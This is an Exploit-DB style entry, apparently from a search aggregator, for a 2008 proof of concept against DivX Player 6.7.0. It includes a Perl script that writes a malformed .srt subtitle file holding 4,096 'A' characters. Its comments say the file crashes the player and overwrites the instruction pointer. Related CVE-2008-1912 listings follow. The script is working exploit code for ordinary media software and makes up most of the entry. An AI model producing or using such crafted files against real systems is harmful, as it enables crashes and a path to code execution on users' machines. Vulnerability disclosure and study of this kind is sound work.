Lucene search
SecurfrogEDB-ID:5453HistoryApr 15, 2008 - 12:00 a.m.
DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)
2008-04-1500:00:00
securfrog
www.exploit-db.com
25
# DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl
my $file="MOVIE_FILENAME.srt";
my $payload = "A" x 4096;
open( $file, ">>$file") or die "Cannot open $file: $!";
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;
close($file);
print "$file has been created \n";
# milw0rm.com [2008-04-15]Related
cvelist
cvelist
CVE-2008-1912
2008-04-22 00:00:00
nvd
nvd
CVE-2008-1912
2008-04-22 04:41:00
exploitdb
exploitdb
DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow
2008-04-24 00:00:00
prion
prion
Stack overflow
2008-04-22 04:41:00
cve
cve
CVE-2008-1912
2008-04-22 04:41:00